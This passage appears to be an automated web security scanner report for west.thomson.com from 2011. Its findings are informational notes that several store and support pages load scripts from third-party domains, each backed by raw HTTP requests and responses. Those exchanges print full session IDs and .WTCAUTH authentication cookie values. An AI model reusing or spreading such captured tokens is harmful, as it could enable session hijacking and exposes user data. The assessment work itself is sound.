function SCPOmnitureSampling(a){this.samplingRate=a;this.samplingCookie="MUID";this.samplingValueNormalizer=1e23;this.samplingValueRadix=16;this.readCookie=function(e){var c=e+"=",d=document.cookie.sp
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

20.54. http://west.thomson.com/Error/500Error.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /Error/500Error.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Error/500Error.aspx?aspxerrorpath=/store/productdetail.aspx HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/productdetail/160547/12484463/productdetail.aspx?PromCode=645229L86530&PromType=internal
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; s_cc=true; s_ppv=100; c_m2=1; c=undefined571419undefined; SC_LINKS=store%3Apromotions%3Aemailpreferences%3Alogin%5E%5EFree%20Ground%20Shipping%5E%5Estore%3Apromotions%3Aemailpreferences%3Alogin%20%7C%20Free%20Ground%20Shipping%5E%5E; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_sq=thwest%3D%2526pid%253Dstore%25253Apromotions%25253Aemailpreferences%25253Alogin%2526pidt%253D1%2526oid%253Dhttps%25253A//west.thomson.com/support/customer-service/order-info.aspx%252523freeshipping%2526ot%253DA; UserSiteIdIdentifier=; .WTCAUTH=15EB1E2BD55FB642DEFDF69E45C933941D077548D9E77F5DFD86AFA9231864655A2D3B0A5DA53C12ECD77027BFA162DFE1C25838CD6ED0BA7EA11DF766E81FF9BE80932A802690C8D89CCD970BFE43D957372263E299FCB576D90CB191BE9C03BFA81FE18D6C1ABC185B6A95A9C3FE7C6D15760BFC5FE4F3A675D865307B7D2C00D2ADADD2A8C8C503C9A225B6F3DB06817479DC6714AA5F037A2AE2E40D4090AC151A6DF079A011C7D783412F0443C1E4CC8EA514A71C6F69B68B045D51D4F25992FD629E534853F1810AB486114ECE9F7CA350D4192436BFB8E836202640C7A7A9CEA9

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:43:02 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=6C2776260A06E0DA7E316662F35CD801FB1884F55F2D184C53D0D2F4AA981F1850DC4F54B455CC740DE6A3A61A343349F17598FFF202335A75BD6FA9930A4102F07FA82899CA9DF3ECE6D45B7DFB1136EF60AAF3D1093EB92D363DEDF846159C5EEA4B2C6654B511316A827828B49D7A8F4BAA567EE0AC56D57D345784960460228A95779E1C4391520F348B9037D5ACF439811F80B15F5EFC008F6F0846F5E0EA79BF17D2624B6A8E054DB0507FE036C08288195B48FA84DF92A90D2ACAFF0CE9218C7C1D32DDD289B076CE7A75DDDCC337F829198E1CBF95448E9FD984AE5899980BD9; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 78059


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta c
...[SNIP]...
<link rel="stylesheet" type="text/css" href='http://west.thomson.com/noexpire/combined.5.1.421.22.min.css' />
<script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js'></script>
<script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js'></script>
...[SNIP]...
</script>

<script type='text/javascript' src='http://media.richrelevance.com/rrserver/js/0.4/p13n.js'></script>
...[SNIP]...
</script><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=wtcthomsonreuters">

                   </script>
...[SNIP]...
<!-- begin Marin Software Tracking Script -->
<script src='http://tracker.marinsm.com/tracker/787f8z6077.js' type='text/javascript'></script>
...[SNIP]...

20.55. http://west.thomson.com/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /default.aspx HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:02:52 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: ASP.NET_SessionId=0xhchh4dyhomfi1jfdhr2vqt; path=/; HttpOnly
Set-Cookie: s_id=0xhchh4dyhomfi1jfdhr2vqt; path=/
Set-Cookie: anonymous_userid_1={6eed97b3-02ac-4505-898e-74b46a092d39}; expires=Fri, 29-Apr-2011 20:02:52 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 73372


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><m
...[SNIP]...
<link rel="stylesheet" type="text/css" href='http://west.thomson.com/noexpire/combined.5.1.421.22.min.css' />
<script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js'></script>
<script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js'></script>
...[SNIP]...
t id ctl00_placeHolderTopNavigation_placeHolderContent_RRMerch1_ctl00_placeHolderTopNavigation_placeHolderContent_RRMerch1_ctl00_placeHolderTopNavigation_placeHolderContent_RRMerch1_Div_R3Placement --><script type='text/javascript' src='http://media.richrelevance.com/rrserver/js/0.4/p13n.js'></script>
...[SNIP]...
</script><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=wtcthomsonreuters">

                   </script>
...[SNIP]...
<!-- begin Marin Software Tracking Script -->
<script src='http://tracker.marinsm.com/tracker/787f8z6077.js' type='text/javascript'></script>
...[SNIP]...

20.56. http://west.thomson.com/productdetail/160547/12484463/productdetail.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /productdetail/160547/12484463/productdetail.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /productdetail/160547/12484463/productdetail.aspx?PromCode=645229L86530&PromType=internal HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:03:22 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=F31052139A373540424741E268099E6241C09AA45A626DE2A38C22E931FE39A836ECA06504AB5E11D899AB974340AC3CA22EFA3BB0676F1C0B8373726AAD802F355075EA717D1B28441FC4F53A7328B7FD809F21298A2BB310E7B3E4873D669AB0C1DC219FC364772434FECA03988543E0C149CD8DC2D028D16CDF8B7C86EE82F6122626596B9EC5B4BD031E6A0CB5A74116B5FFAE079B9DC014893820F0EF5A0D46558FF9B020B1DB315FE28D9157A01B864D7CF4B3A9F4F24F0CF57722CEACF6E4E538CFC9886E21DFACDFB09725777C42B39CBFDE80E488D41C726AC1CBF53B9A1753; path=/
Cache-Control: private, must-revalidate
Expires: Tue, 26 Apr 2011 20:03:22 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 133357


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta c
...[SNIP]...
<link rel="stylesheet" type="text/css" href='http://west.thomson.com/noexpire/combined.5.1.421.22.min.css' />
<script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js'></script>
<script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js'></script>
...[SNIP]...
placeHolderContent_ctl00_R3DisplayRight_ctl00_placeHolderTopNavigation_placeHolderContent_ctl00_R3DisplayRight_ctl00_placeHolderTopNavigation_placeHolderContent_ctl00_R3DisplayRight_Div_R3Placement --><script type='text/javascript' src='http://media.richrelevance.com/rrserver/js/0.4/p13n.js'></script>
...[SNIP]...
</script><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=wtcthomsonreuters">

                   </script>
...[SNIP]...
<!-- begin Marin Software Tracking Script -->
<script src='http://tracker.marinsm.com/tracker/787f8z6077.js' type='text/javascript'></script>
...[SNIP]...

20.57. http://west.thomson.com/store/secure/ShoppingBasket.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /store/secure/ShoppingBasket.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /store/secure/ShoppingBasket.aspx?PromCode=571423 HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; UserSiteIdIdentifier=; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:03:24 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=5B554B6F6DD767F208B345EAA979222AFB75B1D39D5072C8AC8163224D602E4EA0791659ECC40EAA04995AD2414A1EF63E920C2406A52D5A77C772B7312571F0AAC96B34372DB47CEF38803A8D2B7154B70F6215558C4BE194B8F6631FFDBEECF7D4256904225BA30EA921CF83C914FF8CF103200841FE605F66B636573E74A9FE11E39E665181B5E833711454838B5B5EDDAB8E52F237C0742B8087456FDD46A9875A0BD3BE7D68841EDA7A916AA72ACAB0B687055A7BCB2C0B64F0382E8FCCEA3EEE09697283C17C482DF2DE2D55F26A8BD1E5F9CC9D2F12F213FCC63F2AE7AFD0ECCE; path=/
Set-Cookie: SbasketVw=T; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 107323


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta c
...[SNIP]...
<link rel="stylesheet" type="text/css" href='http://west.thomson.com/noexpire/combined.5.1.421.22.min.css' />
<script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js'></script>
<script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js'></script>
...[SNIP]...
tl00_placeHolderTopNavigation_placeHolderContent_R3Display2_ctl00_placeHolderTopNavigation_placeHolderContent_R3Display2_ctl00_placeHolderTopNavigation_placeHolderContent_R3Display2_Div_R3Placement --><script type='text/javascript' src='http://media.richrelevance.com/rrserver/js/0.4/p13n.js'></script>
...[SNIP]...
</script><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=wtcthomsonreuters">

                   </script>
...[SNIP]...
<!-- begin Marin Software Tracking Script -->
<script src='http://tracker.marinsm.com/tracker/787f8z6077.js' type='text/javascript'></script>
...[SNIP]...

20.58. http://west.thomson.com/support/contact-us/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /support/contact-us/default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:03:34 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=89EA3F93E09614D9A098CCCF9C0F29D3204EE9663C01D51E95CD9C592CDADB23A34786B30EBABB2390E7FEA51BBE62180DADFAF255CA8AB719509015068D68C8075FE6A23F095DF549827C80033255DA36E699502293674B6D668FCAE278ADD04138D880C6A3F40E0EDE98A77853F1F1B45413E1BE2A34BEE937DCCCDA776CE1ABCED0F26FB69F2755769BB874466A73E9A83CADFE53A93539D3BD0332C48F697F141BAC00E38E27C2938518BE9D5C9648C952E2BEF872DC06486975DC27BFACFEF36294DEAF331A255D5995D5F54EF39A2AFCD97B20A7D318572959553AEEC610017BD6; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 90651


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><m
...[SNIP]...
<link rel="stylesheet" type="text/css" href='http://west.thomson.com/noexpire/combined.5.1.421.22.min.css' />
<script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js'></script>
<script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js'></script>
...[SNIP]...
</script>

<script type='text/javascript' src='http://media.richrelevance.com/rrserver/js/0.4/p13n.js'></script>
...[SNIP]...
</script><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=wtcthomsonreuters">

                   </script>
...[SNIP]...
<!-- begin Marin Software Tracking Script -->
<script src='http://tracker.marinsm.com/tracker/787f8z6077.js' type='text/javascript'></script>
...[SNIP]...

20.59. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://west.thomson.com
Path:   /store/Promotions/EmailPreferences/Login.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419&FindingMethod=Navigation HTTP/1.1
Host: west.thomson.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:04:15 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=A85C2F3C93F050051A95CC95A3B0888C03B9DBEF0A026D745D0656E2E3DE853394140B6D80EEE33684BAC22241C10BCEC46D800215998CBC7CB21197B52E754E19FAA6C1F1725A6249D03181F66A430ECE47F662E7EF119243B001BEA25F850311DCB9495BBDE849BAEAE38CFAF69EE6C71B979EC9A46B08E8C5B362E255E6FCD960E943F41886886E045C4EB97A5121632E495A2DE980E64EC33F053829F75AEDFBDE371B36DC072FBB362065481E66F8EFF61623D579526A71AC8DD9F30FF1BFAD99A5FA5D2AE551F509B6E57AC0127A7E82DD4063747DCDE458BCBBFA35D0CE53B82A; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 69722


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<link rel="stylesheet" type="text/css" href='https://west.thomson.com/noexpire/combined.5.1.421.22.min.css' />
<script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js'></script>
<script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js'></script>
...[SNIP]...
</script>

<script type='text/javascript' src='https://media.richrelevance.com/rrserver/js/0.4/p13n.js'></script>
...[SNIP]...
</script><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=wtcthomsonreuters">

                   </script>
...[SNIP]...
<!-- begin Marin Software Tracking Script -->
<script src='https://tracker.marinsm.com/tracker/787f8z6077.js' type='text/javascript'></script>
...[SNIP]...

20.60. https://west.thomson.com/store/secure/EmptyBasket.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://west.thomson.com
Path:   /store/secure/EmptyBasket.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /store/secure/EmptyBasket.aspx HTTP/1.1
Host: west.thomson.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; s_cc=true; c_m2=1; c=undefined645229L86530undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%5D; gpv_pn=Bankruptcy%20Exemption%20Manual%2C%202010%20ed.%20%28West%27s%26%23174%3B%20Bankruptcy%20Series%29; s_ppv=0; s_sq=%5B%5BB%5D%5D; UserSiteIdIdentifier=; .WTCAUTH=0D1C43F14C3D0360D4C56BDD0D49E3A1E347C13F76ADC1B282235271457FAC648FB37FE6B223762A24E6CB268609BC8463ECB71442613CE6C286443DD8C796AD188F8568D73785118A509021BEABBD4E55D10E5F1E3A4F4A3F1B558AB2332C44A56F489B0571AEA92276AE792D9D8761A0FBB7322D072015D4B719941EFD8FCB5CDB63E1CEF01EF859C876D1DA920B7EB3539BA4B4D934B5A3CF2F56BB805BA3F3435E9F173B50A3D9F7C34D0C8E7180A2F74BC8118F96769794F6D4C7A36DCE92EEA8FE38E72E95AF86A85ADB9338C9E73EDA3652910D79D1A7D57B6EF7422F00DB82A9

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:06:52 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=79CBDB991A6459338884A46B49D0105C145D63087A0F6EA1AF1008AF8F10A6BE20B4B11D124F705A3B3E14AC22EC73DD213F5F9EEB5214BC1762EE7929A0F454C61A0BDCF1DEC78E1A8885681779E756F6C33BB53E5D00DC20A327C71B7A18A01CD2DEC0CB430995B2D528EAE5EDE656A06490C12141D8DC1BDB52EA377E9C528F52835D9BB8C6526E44BC00F17481EEE8BAF4CEFD033D588FC1950953DF71D7BEC464ACA7CC296D962C2F89E8B7BF9E2164F2A2485B2AD03B442B72330D47CEE8F0DEFDB9FFFF7F71AE584B4FEA6F98140E539AF54249B185FB8811D025A5E2F4D81C75; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 68662


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta c
...[SNIP]...
<link rel="stylesheet" type="text/css" href='https://west.thomson.com/noexpire/combined.5.1.421.22.min.css' />
<script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js'></script>
<script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js'></script>
...[SNIP]...
</script>

<script type='text/javascript' src='https://media.richrelevance.com/rrserver/js/0.4/p13n.js'></script>
...[SNIP]...
</script><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=wtcthomsonreuters">

                   </script>
...[SNIP]...
<!-- begin Marin Software Tracking Script -->
<script src='https://tracker.marinsm.com/tracker/787f8z6077.js' type='text/javascript'></script>
...[SNIP]...

20.61. https://west.thomson.com/store/secure/ShippingInfo.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://west.thomson.com
Path:   /store/secure/ShippingInfo.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /store/secure/ShippingInfo.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24cmbBucketCategory=adv_bkt_Books&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24txtSearch=keyword%2c+title%2c+author+or+ISBN&Ctl00%24placeHolderTopNavigation%24placeHolderContent%24basketItems%24ctl00%24txtQuantity=1&ChkCCMe=CC+Me&PageTitle=cart HTTP/1.1
Host: west.thomson.com
